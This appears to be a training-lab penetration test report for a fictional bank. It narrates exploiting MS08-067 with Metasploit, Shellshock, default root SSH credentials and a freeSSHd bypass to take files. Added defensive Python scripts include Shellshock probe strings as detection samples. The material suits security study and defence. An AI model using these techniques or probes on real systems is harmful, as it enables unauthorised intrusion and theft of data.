Open ports and services running on machine 172.19.19.6:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.6/24 we discovered the open ports and
running services of machine 172.19.19.6


Figure 1.26

Open ports and services running on machine 172.19.19.7:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.7/24 we discovered the open ports and
running services of machine 172.19.19.7


Figure 1.27
Open ports and services running on machine 172.19.19.8:
With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.8/24 we discovered the open ports and
running services of machine 172.19.19.8


Figure 1.28

Open ports and services running on machine 172.19.19.9:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.9/24 we discovered the open ports and
running services of machine 172.19.19.9


Figure 1.29

Open ports and services running on machine 172.19.19.10:

With the Zenmap tool and the command nmap -sS -sV -T4 -v 172.19.19.10/24 we discovered the open ports and
running services of machine 172.19.19.10


Figure 1.19


THE LIST BELOW CAN BE USED AS A REFERENCE FOR FURTHER PENTESTING:
IP ADDRESS OF EACH MACHINE / OPERATING SYSTEM AND ITS VERSION / HOST NAME / OPEN PORTS ON
THE MACHINE AND THE SERVICES RUNNING ON EACH OPEN PORT

Sr no. / IP address of the machine / Operating system and version / Host name / Open ports and the services running on them

1. 172.19.19.1 (GNAT)
   OS: Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790
   Open ports / services: 135 msrpc, 139 netbios-ssn, 445 microsoft-ds, 1025 msrpc, 3389 ms-wbt-server

2. 172.19.19.2 (ACCOUNTS)
   OS: Microsoft Windows 7 Ultimate with Service Pack 1 (SP1) ver 6.1 and Build 7601
   Open ports / services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3389 ms-wbt-server,
   49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

3. 172.19.19.3 (WIN-ULY858KHQIP)
   OS: Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1) ver 6.0 and Build 6001
   Open ports / services: 53 domain, 80 http, 88 kerberos-sec, 135 msrpc, 139 netbios-ssn, 389 ldap,
   445 microsoft-ds, 464 kpasswd5, 593 ncacn_http, 636 tcpwrapped, 3268 ldap, 3269 tcpwrapped,
   3389 ms-wbt-server, 5357 http, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc,
   49157 ncacn_http, 49158 msrpc, 49161 msrpc, 49165 msrpc

4. 172.19.19.4 (ADVERTISEMENT)
   OS: Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1) ver 6.0 and Build 6001
   Open ports / services: 21 tcpwrapped, 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 5357 http,
   49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

5. 172.19.19.5 (UBUNTU HOST)
   OS: Linux Kernel 3.0 on Ubuntu 12.04
   Open ports / services: 80 http

6. 172.19.19.6 (HRDEPT)
   OS: Microsoft Windows Server 2012 Datacenter Edition
   Open ports / services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3306 mysql, 49152 mysql,
   49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc, 49158 msrpc

7. 172.19.19.7 (MARKETING)
   OS: Microsoft Windows Server 2008 Standard with Service Pack 1 (SP1) ver 6.0 and Build 6001
   Open ports / services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 5357 http,
   49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

8. 172.19.19.8 (OPERATIONS)
   OS: Microsoft Windows XP
   Open ports / services: 135 msrpc, 139 netbios-ssn, 445 microsoft-ds, 3389 ms-wbt-server

9. 172.19.19.9 (RDDEPT)
   OS: Microsoft Windows 8 Pro with Service Pack 1 (SP1) ver 6.2 Build 9200
   Open ports / services: 21 ftp, 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3306 mysql,
   3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc,
   49158 msrpc

10. 172.19.19.10 (SALES)
   OS: Microsoft Windows 7 Ultimate with Service Pack 1 (SP1) ver 6.1 and Build 7601
   Open ports / services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3306 ms-wbt-server,
   3389 msrpc, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

11. 172.17.0.1 (GNAT)
   OS: Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790
   Open ports / services: 135 msrpc, 139 netbios-ssn, 445 microsoft-ds, 1025 msrpc, 3389 ms-wbt-server

12. 172.17.0.2 (WIN-AG46I02QBKJ)
   OS: Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1) ver 6.1 Build 7601
   Open ports / services: 21 tcpwrapped, 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn,
   3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

13. 172.17.0.3 (CENTOS HOST)
   OS: Linux Kernel 2.6 on CentOS Release 6.4 Final
   Open ports / services: 21 ftp, 22 ssh, 23 telnet

14. 10.10.0.1 (GNAT)
   OS: Microsoft Windows Server 2003 with Service Pack 2 (SP2) ver 5.2 and Build 3790
   Open ports / services: 135 msrpc, 139 netbios-ssn, 445 microsoft-ds, 1025 msrpc, 3389 ms-wbt-server

15. 10.10.0.2 (ENTERTAINMENT)
   OS: Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1) ver 6.1 Build 7601
   Open ports / services: 21 tcpwrapped, 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn,
   3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

16. 10.10.0.3 (ECOMM)
   OS: Microsoft Windows Server 2008 R2 Enterprise Service Pack 1 (SP1) ver 6.1 Build 7601
   Open ports / services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3306 mysql,
   3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc
Table 6 : All Machines IP Address/Operating system/Host names/Open ports/Services running
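The host discovery, OS fingerprinting and service scans above were run one host at a time in Zenmap and then transcribed by hand into Table 6. As an added example (this is not code from the report, from nmap or from Zenmap), the Python below reads nmap's greppable output (nmap ... -oG file), merges the Status and Ports lines into one record per host, and flags the exposures the following challenges rely on: an end-of-life Windows version, SMB reachable on 139/445, and cleartext FTP/Telnet. The three scan lines, the RISKY_SERVICES policy and the EOL_OS_MARKERS list are constructed for the example and are not the report's scan output.

```python
"""Build a host inventory from nmap greppable (-oG) output and flag risky exposure.

Added example, not part of the XSecurity report or of nmap. The scan lines below
are constructed to resemble three of the report's hosts; they are not the
report's actual scan output.
"""
import re
from dataclasses import dataclass, field

# Constructed sample of `nmap -sS -sV -O -oG -` output (nmap emits one Host: line
# for status and one for ports). Per-port layout: port/state/proto/owner/service/rpcinfo/version/
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated (constructed sample)
Host: 172.19.19.8 (OPERATIONS)\tStatus: Up
Host: 172.19.19.8 (OPERATIONS)\tPorts: 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3389/open/tcp//ms-wbt-server///\tOS: Microsoft Windows XP
Host: 172.17.0.3 (CENTOS HOST)\tPorts: 21/open/tcp//ftp//vsftpd 2.2.2/, 22/open/tcp//ssh//OpenSSH 5.3/, 23/open/tcp//telnet///\tOS: Linux 2.6
Host: 172.19.19.5 (UBUNTU HOST)\tPorts: 80/open/tcp//http//Apache httpd 2.2.22/, 443/closed/tcp//https///\tOS: Linux 3.0
# Nmap done (constructed sample)
"""

HOST_RE = re.compile(r"^Host:\s+(?P<ip>\S+)\s+\((?P<name>[^)]*)\)\t(?P<rest>.*)$")
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")

# Assumed policy for this example: services that should not be reachable on a
# production segment, and end-of-life OS strings that warrant an alert.
RISKY_SERVICES = {
    "telnet": "cleartext remote login",
    "ftp": "cleartext file transfer",
    "microsoft-ds": "SMB reachable on 445 (the MS08-067 attack surface)",
    "netbios-ssn": "NetBIOS session service reachable on 139",
    "mysql": "database listener reachable from the network",
}
EOL_OS_MARKERS = ("Windows XP", "Windows Server 2003", "Windows 2000")


@dataclass
class Host:
    ip: str
    hostname: str = ""
    os: str = ""
    ports: list = field(default_factory=list)  # (port, proto, service, version)


def parse_gnmap(text):
    """Return one Host per IP, merging the Status and Ports lines nmap emits."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything else that is not a Host: record
        host = hosts.setdefault(m["ip"], Host(m["ip"], m["name"]))
        fields = dict(f.split(": ", 1) for f in m["rest"].split("\t") if ": " in f)
        host.os = fields.get("OS", host.os)
        for port, state, proto, _owner, service, _rpc, version in PORT_RE.findall(fields.get("Ports", "")):
            if state == "open":  # closed/filtered ports are not exposure
                host.ports.append((int(port), proto, service, version))
    return list(hosts.values())


def assess(host):
    """Return human-readable findings for one host under the assumed policy."""
    findings = []
    if any(marker in host.os for marker in EOL_OS_MARKERS):
        findings.append(f"end-of-life OS '{host.os}': no security patches available")
    for port, proto, service, _version in host.ports:
        if service in RISKY_SERVICES:
            findings.append(f"{port}/{proto} {service}: {RISKY_SERVICES[service]}")
    return findings


def inventory(text):
    """Map IP -> (hostname, os, open port count, findings) for the report table."""
    return {h.ip: (h.hostname, h.os, len(h.ports), assess(h)) for h in parse_gnmap(text)}


if __name__ == "__main__":
    for ip, (name, os_name, n_ports, findings) in inventory(SAMPLE_GNMAP).items():
        print(f"{ip} ({name}) {os_name}: {n_ports} open ports")
        for finding in findings:
            print("   -", finding)
```

Run against the real -oG file instead of SAMPLE_GNMAP and diff the result against the asset register: a host like OPERATIONS (Windows XP with 445 open) should then be caught by the inventory process rather than by the next pentest.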

CHALLENGE 2:
Objective:
Exploit and root the machine named Operations and do the following:
1. Present the hash value of the file “Employee Insurance Details.xlsx” hidden somewhere
in the user folders.
2. FNB management has discovered one of their employees has transferred sensitive
information outside the organization using their machine. The network admin tried to
ascertain this but could not find anything concrete. He however did discover some large
images in a folder named Personal. This was in violation of the organization’s policy of
not storing any personal information on office computers. As a penetration tester, your
task is to verify if these images were used to send sensitive information and present the
hidden message in the pen testing report.


IP address of the machine / Operating system and version / Host name / Open ports and the services running on them

172.19.19.8 (OPERATIONS)
   OS: Microsoft Windows XP
   Open ports / services: 135 msrpc, 139 netbios-ssn, 445 microsoft-ds, 3389 ms-wbt-server

Threat Description: This is a remote code execution vulnerability. An attacker who
successfully exploited this vulnerability could take complete control of an affected system
remotely. On Microsoft Windows 2000-based, Windows XP-based, and Windows Server 2003-
based systems, an attacker could exploit this vulnerability over RPC without authentication and
could run arbitrary code. If an exploit attempt fails, this could also lead to a crash in Svchost.exe.
If the crash in Svchost.exe occurs, the Server service will be affected. The Server service
provides file, print, and named pipe sharing over the network.
The vulnerability is caused by the Server service, which does not correctly handle specially
crafted RPC requests.

Tools Used:
Nessus: Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any
computer you have connected to a network.
QuickStego: QuickStego lets you hide text in pictures so that only other users of QuickStego
can retrieve and read the hidden secret messages. Once text is hidden in an image the saved
picture is still a 'picture'; it will load just like any other image and appear as it did before.

Methodology:
Challenge 2.1: Present the hash value of the file “Employee Insurance Details.xlsx” hidden
somewhere in the user folders.
With the help of the Nessus tool we did a vulnerability assessment and found the vulnerability
MS08-067, which is a remote code execution vulnerability.


Figure 2.1.1

Then we searched for the exploit module on the Rapid7 website, as shown below.


Figure 2.1.2


Figure 2.1.3

On the Kali machine we started the exploit process by opening a command line terminal,
typing msfconsole and pressing Enter. This launched msfconsole.


Figure 2.1.4
Then we searched for the exploit, as shown in Figure 2.1.5 below.

Figure 2.1.5
The search results are shown in the screenshot; we used the exploit found, as shown in Figure 2.1.6 below.


Figure 2.1.6

Then we used the show command to list the payload options.
Figure 2.1.7

Then we searched for the windows/meterpreter/reverse_tcp payload.


Figure 2.1.8

Then we set the payload, as shown in the figure below.


Figure 2.1.9


Then we typed the show options command, as shown below, to check the LHOST, RHOST and RPORT settings.
Figure 2.1.10


We typed the show options command, as shown below, to check the LHOST, RHOST and RPORT settings.
Figure 2.1.11


Then we set LHOST, RHOST, RPORT and LPORT and ran the exploit.

Figure 2.1.12
After obtaining the Meterpreter session we searched for the file “Employee Insurance Details.xlsx”
and downloaded it.

Figure 2.1.13


After downloading the file we extracted the md5sum value of “Employee Insurance Details.xlsx”.

Figure 2.1.14

Recommendation:
Block TCP ports 139 and 445 at the firewall. These ports are used to initiate a connection with
the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect
systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft
recommends that you block all unsolicited inbound communication from the Internet to help
prevent attacks that may use other ports.
Microsoft has also ended support for Windows XP. It is recommended not to use Windows XP,
since no security patches or updates are available for it any more.

Challenge 2.2: FNB management has discovered one of their employees has transferred
sensitive information outside the organization using their machine. The network admin
tried to ascertain this but could not find anything concrete. He however did discover
some large images in a folder named Personal. This was in violation of the organization’s
policy of not storing any personal information on office computers. As a penetration
tester, your task is to verify if these images were used to send sensitive information and
present the hidden message in the pen testing report.


With the help of the Nessus tool we did a vulnerability assessment and found the vulnerability
MS08-067, which is a remote code execution vulnerability.

Figure 2.1.1

We searched for the exploit module on the Rapid7.com website.


Figure 2.1.2

We searched for the exploit module on the Rapid7.com website; the search results are given below.


Figure 2.1.3
We launched a new command line terminal, typed msfconsole and pressed Enter. This
launches msfconsole.


Figure 2.1.4

Then we searched for the exploit, as shown in the figure below.

Figure 2.1.5
Then we typed the use command with the module found, as shown in the figure below.


Figure 2.1.5
Displayed below are the results of the use command with the module found.


Figure 2.1.6


Then we searched for the windows/meterpreter/reverse_tcp payload, shown in the figure below.

Figure 2.1.7
Displayed below are the complete results of the use command with the module found.


Figure 2.1.8


Then we typed the show options command, as shown below, to check the LHOST, RHOST, RPORT and LPORT settings.
Figure 2.1.9
Then we set LHOST, RHOST, RPORT and LPORT and ran the exploit.


Figure 2.1.9
After gaining the Meterpreter session we searched for JPG and BMP files with the help of the search
command and found the files in the folder C:\Documents and Settings\Administrator\My Documents\Personal.


Figure 2.1.1


After the search we downloaded the JPG and BMP files from the folder
C:\Documents and Settings\Administrator\My Documents\Personal.
Figure 2.1.12
After downloading the Personal folder we changed its access permissions, copied the folder from the
root directory and pasted it into root/var/www, then started the Apache server.

Figure 2.1.11
Through the Apache web server we browsed the directory containing the JPG and BMP files.


Figure 2.1.12
Thumbnail view of the JPG and BMP files in the folder

Figure 2.1.12


QuickStego lets you hide text in pictures so that only other users of QuickStego can retrieve and
read the hidden secret messages. Of the four JPG/BMP files, with the help of this tool we retrieved
the hidden message from the BMP file The_sower.bmp.

Figure 2.1.13
Recommendation: Further strengthen the IT security policy, grant information access on a role-based
and need-to-know basis, and conduct an internal audit to verify that this has been implemented
and is being followed.

CHALLENGE 3:
Objective:
Compromise the Ubuntu machine in the network. The challenge requires you to present the
hash value of the file "Customer Data.xlsx". This file contains customer sensitive
information such as credit card details.

IP address of the machine / Operating system and version / Host name / Open ports and the services running on them

172.19.19.5 (UBUNTU HOST)
   OS: Linux Kernel 3.0 on Ubuntu 12.04
   Open ports / services: 80 http


Threat Description: A GNU Bash vulnerability, referred to as Shellshock or the "Bash Bug", was
disclosed. In short, the vulnerability allows remote attackers to execute arbitrary code under
certain conditions by passing strings of code following environment variable assignments.
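The condition described above leaves a trace on the web server side: a vulnerable CGI script is reached through a request field whose value starts with a Bash function definition, and Apache writes the request line, Referer and User-Agent of every request to its access log. As an added example that is not part of the report, the Python below scans Apache combined-format access log lines for that signature, percent-decoding each field before matching. The log lines are constructed (the /cgi-bin/cinema path mirrors the one found in this challenge); the pattern is deliberately broad, so treat hits as alerts to triage rather than as proof of compromise.

```python
"""Flag Shellshock (CVE-2014-6271) probes in Apache access logs.

Added example, not part of the XSecurity report. The log lines are constructed;
the Apache combined log format and the "() {" function-definition prefix that
triggers the bug are real, everything else is illustrative.
"""
import re
from urllib.parse import unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Bash parses an environment value that starts with "() {" as a function body;
# vulnerable versions keep executing whatever follows the closing "};".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{[^}]*\}\s*;")

# Constructed sample: a normal visit to the cgi-bin/cinema page, then probes
# carrying the signature in User-Agent, in Referer and in a URL-encoded query.
SAMPLE_LOG = """\
172.19.19.22 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/cinema HTTP/1.1" 200 2326 "-" "Mozilla/5.0 (X11; Linux x86_64)"
172.19.19.22 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/cinema HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
172.19.19.22 - - [10/Oct/2014:13:56:09 +0000] "GET /cgi-bin/cinema HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.38.0"
10.10.0.50 - - [10/Oct/2014:14:02:45 +0000] "GET /cgi-bin/cinema?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20vulnerable HTTP/1.1" 200 512 "-" "curl/7.38.0"
this line is not in combined format and is skipped
"""


def shellshock_hits(log_text):
    """Return one dict per request whose decoded fields carry the signature."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; a real run would count these
        # Apache logs the raw request line, so percent-decode before matching.
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(unquote(m[field])):
                hits.append({"ip": m["ip"], "time": m["time"], "field": field,
                             "request": m["request"], "status": m["status"]})
                break  # one alert per request, whichever field matched first
    return hits


def sources(hits):
    """Probing addresses in first-seen order, for blocking or correlation."""
    return list(dict.fromkeys(h["ip"] for h in hits))


if __name__ == "__main__":
    for h in shellshock_hits(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["field"]:8} {h["status"]} {h["request"]}')
```

The regex has the same shape as the public IDS signatures for CVE-2014-6271. The fix remains patching Bash, as the recommendation at the end of this challenge says; what this adds for the responder is the list of source addresses and the exact requests to review, and a 200 status on a probe is the line worth looking at first.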
Tools Used:
DirBuster:
DirBuster is a multi-threaded Java application designed to brute force directory and file names
on web/application servers. It is often the case that what looks like a web server in a state of
default installation is actually not, and has pages and applications hidden within. DirBuster
attempts to find these.
Burp Suite:
Burp Suite is an integrated platform for performing security testing of web applications. Its
various tools work seamlessly together to support the entire testing process, from initial mapping
and analysis of an application's attack surface, through to finding and exploiting security
vulnerabilities.
Methodology:
We scanned for vulnerabilities.

Figure 3.1

With the help of the DirBuster tool we brute-forced directory and file names on the Ubuntu server
and found the following files and the cgi-bin directory.


Figure 3.2

With the help of dirb we found the folder cgi-bin/cinema.

Figure 3.3

We browsed the URL given below and intercepted the request in the Burp Suite tool; it showed
that this was a demonstration of the Shellshock vulnerability.


Figure 3.4
With the help of the script given below:

Figure 3.5

With the script given below we found the folders on the machine under /home/Jason.


Figure 3.6

With the script given below we found the file Customer Data.xlsx, whose md5sum needs to be extracted.

Figure 3.7


With the script given below we extracted the md5sum of Customer Data.xlsx.

Figure 3.8
Recommendation: Be sure to update all of your affected servers to the latest version of Bash. Also, be
sure to keep your servers up to date with the latest security updates.

CHALLENGE 4:
Objective:
Compromise the CentOS machine in the network. The challenge requires you to present the
hash value of the file named "Terms of Service". This file contains sensitive agreements between
FNB and their customers.

IP address of the machine / Operating system and version / Host name / Open ports and the services running on them

172.17.0.3 (CENTOS HOST)
   OS: Linux Kernel 2.6 on CentOS Release 6.4 Final
   Open ports / services: 21 ftp, 22 ssh, 23 telnet

Threat Description:
An SSH brute-force attack automatically and systematically attempts to guess the correct username
and password combination for a service. Its goal is to find valid logins and leverage them to gain
access to a network and extract sensitive data, such as password hashes and tokens.
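The Greenbone finding in this challenge (an SSH login accepted with default credentials) leaves the same trace on the server as a brute-force run does: a burst of "Failed password" lines followed by an "Accepted password" line in the sshd log. As an added example that is not part of the report, the Python below replays constructed auth.log lines (dated 2014 for the example, because syslog timestamps carry no year) and raises one alert when a source exceeds a failure threshold inside a sliding time window, and another when a password login for root is accepted, which the example's assumed policy forbids.

```python
"""Detect SSH password brute force and root password logins in an auth.log.

Added example, not part of the XSecurity report. The log lines are constructed
to mirror the challenge (guesses against root, then a successful password
login); the sshd message formats are real.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

ASSUMED_YEAR = 2014  # syslog timestamps carry no year; the constructed sample is dated 2014

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)

# Constructed sample: one stray guess, a burst against root, the accepted
# default password, and a legitimate key-based login later.
SAMPLE_AUTH_LOG = """\
Oct 10 14:00:30 centoshost sshd[2000]: Failed password for invalid user oracle from 10.10.0.50 port 40000 ssh2
Oct 10 14:01:01 centoshost sshd[2101]: Failed password for root from 172.19.19.22 port 51000 ssh2
Oct 10 14:01:02 centoshost sshd[2102]: Failed password for root from 172.19.19.22 port 51001 ssh2
Oct 10 14:01:03 centoshost sshd[2103]: Failed password for root from 172.19.19.22 port 51002 ssh2
Oct 10 14:01:04 centoshost sshd[2104]: Failed password for root from 172.19.19.22 port 51003 ssh2
Oct 10 14:01:05 centoshost sshd[2105]: Failed password for root from 172.19.19.22 port 51004 ssh2
Oct 10 14:01:06 centoshost sshd[2106]: Failed password for root from 172.19.19.22 port 51005 ssh2
Oct 10 14:01:09 centoshost sshd[2109]: Accepted password for root from 172.19.19.22 port 51008 ssh2
Oct 10 14:30:00 centoshost sshd[2200]: Accepted publickey for admin from 172.19.19.40 port 52000 ssh2
"""


def parse_ts(ts):
    """Turn a syslog 'Mon DD HH:MM:SS' stamp into a datetime using the assumed year."""
    return datetime.strptime(f"{ASSUMED_YEAR} {ts}", "%Y %b %d %H:%M:%S")


def detect(log_text, threshold=5, window_seconds=60):
    """Return (ip, alert_type, detail) tuples in the order the evidence appears.

    brute-force: at least `threshold` failed logins from one IP inside a sliding
    window of `window_seconds` (reported once per IP).
    root-password-login: sshd accepted a password for root, which the assumed
    policy forbids (root should use keys or not log in remotely at all).
    """
    alerts = []
    failures = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    flagged = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd/syslog lines are not relevant here
        t, ip, user = parse_ts(m["ts"]), m["ip"], m["user"]
        if m["result"] == "Failed":
            window = failures[ip]
            window.append(t)
            while (t - window[0]).total_seconds() > window_seconds:
                window.popleft()  # drop failures older than the window
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append((ip, "brute-force",
                               f"{len(window)} failed logins within {window_seconds}s (last user '{user}')"))
        elif m["method"] == "password" and user == "root":
            alerts.append((ip, "root-password-login",
                           f"password login as root accepted after {len(failures[ip])} recent failures"))
    return alerts


if __name__ == "__main__":
    for ip, kind, detail in detect(SAMPLE_AUTH_LOG):
        print(f"{kind:20} {ip:16} {detail}")
```

The threshold and window are parameters so they can be tuned per host; on a production box this is the logic fail2ban or a SIEM rule implements. The cheaper control is configuration: setting PermitRootLogin to prohibit-password (or no) in sshd_config means the second alert can never fire, and the password policy in the recommendation below keeps the first from succeeding.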

Tools Used:


Greenbone Security Assistant:
The Greenbone Security Assistant is a web application that connects to the OpenVAS Manager
and OpenVAS Administrator to provide a full-featured user interface for vulnerability
management.

PuTTY:
PuTTY is an SSH and Telnet client, developed originally by Simon Tatham for the Windows
platform. PuTTY is open source software that is available with source code and is developed and
supported by a group of volunteers.

Methodology:
We did a vulnerability assessment with the help of the Greenbone Security Assistant and found the
SSH brute force login with default login vulnerability shown below.


Figure 4.1
We further extracted the default login credentials, i.e. username root and password "password", as
shown below.


Figure 4.2

With the help of the PuTTY tool we logged in to the server with the default credentials, i.e. username
root and password "password".

CONFIDENTIAL Page | Error: Reference source not found


Xsecurity, LLC CONFIDENTIAL Penetration Test Report for
FNB Financial Service

Figure 4.3
Once connected to the server, listed the directory structure with the "ls" command and searched for the file named Terms of Service.pdf, whose md5sum was to be calculated. We found the file in the /home/Admin/Documents folder. Finally extracted the md5sum of the PDF file as shown in the figure below.

Figure 4.4

Recommendation: Always follow a standard password policy, i.e. a minimum of 8 characters, alphanumeric with special characters, and strong, non-guessable passwords.
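Detection is the defensive counterpart to the brute force attack described in the threat description above. The following script is an added example written for this report, not part of the XSecurity methodology or tooling: it parses OpenSSH auth.log lines (the sample below is constructed, not taken from the CentOS host), flags a source address that accumulates repeated failures inside a short window, and records the account whose password-based login then succeeded from that address. The threshold, window and supplied year are assumed values.

```python
"""Detect SSH password guessing followed by a successful login in OpenSSH
auth.log records. Added example for this report; the log lines are constructed
and are not taken from the CentOS host."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: five failures from one address, then a password login,
# followed by an unrelated user logging in with a key after one typo.
SAMPLE_LOG = """\
Mar  3 10:01:02 centos sshd[2211]: Failed password for root from 192.0.2.10 port 51001 ssh2
Mar  3 10:01:03 centos sshd[2213]: Failed password for root from 192.0.2.10 port 51002 ssh2
Mar  3 10:01:04 centos sshd[2215]: Failed password for invalid user admin from 192.0.2.10 port 51003 ssh2
Mar  3 10:01:05 centos sshd[2217]: Failed password for root from 192.0.2.10 port 51004 ssh2
Mar  3 10:01:06 centos sshd[2219]: Failed password for root from 192.0.2.10 port 51005 ssh2
Mar  3 10:01:07 centos sshd[2221]: Accepted password for root from 192.0.2.10 port 51006 ssh2
Mar  3 10:30:00 centos sshd[2301]: Failed password for alice from 198.51.100.7 port 40001 ssh2
Mar  3 10:30:20 centos sshd[2303]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)

def parse_auth_log(text, year=2024):
    """Return (timestamp, result, method, user, ip) tuples. Syslog lines carry
    no year, so one is supplied (assumed value)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["method"], m["user"], m["ip"]))
    return events

def find_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Map source ip -> {'failures': n, 'compromised_user': name or None}.

    A source reaching `threshold` failures inside `window` is flagged; a later
    password-based 'Accepted' from the same source, while still inside the
    window, records the account that was guessed. Key-based logins are not
    counted as a guessed password."""
    recent = defaultdict(list)   # ip -> timestamps of failures still in window
    alerts = {}
    for ts, result, method, user, ip in sorted(events):
        recent[ip] = [t for t in recent[ip] if ts - t <= window]
        if result == "Failed":
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold:
                alerts.setdefault(ip, {"failures": 0, "compromised_user": None})
                alerts[ip]["failures"] = len(recent[ip])
        elif method == "password" and len(recent[ip]) >= threshold:
            alerts[ip]["compromised_user"] = user
    return alerts
```

Running `find_bruteforce(parse_auth_log(SAMPLE_LOG))` flags 192.0.2.10 with five failures and root as the guessed account, while the single mistyped password from 198.51.100.7 produces no alert. The same shape of rule applies to the telnet and FTP services listed on this host once their logs are parsed.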

CHALLENGE 5:
Objective:
Exploit one of the vulnerable applications in the machine named ACCOUNTS.
1. Present the hash value of a file named FNB_Trading_Summary.
2. Find the password of a user named Arnold.
IP address: 172.19.19.2
Operating system and version: Microsoft Windows 7 Ultimate with Service Pack 1 (SP1), ver 6.1, Build 7601
Host name: ACCOUNTS
Open ports and services: 80 http, 135 msrpc, 139 netbios-ssn, 445 netbios-ssn, 3389 ms-wbt-server, 49152 msrpc, 49153 msrpc, 49154 msrpc, 49155 msrpc, 49156 msrpc, 49157 msrpc

Threat Description:
The remote SSH server is configured to allow weak encryption algorithms.

Tools Used:
Greenbone Security Assistant:
The Greenbone Security Assistant is a web application that connects to the OpenVAS Manager and OpenVAS Administrator to provide a full-featured user interface for vulnerability management.
Cain & Abel: Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

Methodology:
Performed a vulnerability assessment with Greenbone Security Assistant and found the SSH weak encryption algorithms supported vulnerability shown below.

Figure 5.1
SSH weak encryption algorithms supported vulnerability result details

Figure 5.2
Searched for the exploit module for freeSSHd as shown below.

Figure 5.3
On the Kali operating system machine, started the exploit process by opening a command line terminal, typing msfconsole and pressing Enter. This launched msfconsole. Then used exploit windows/ssh/Freesshd_Authbypass and typed show options.

Figure 5.4

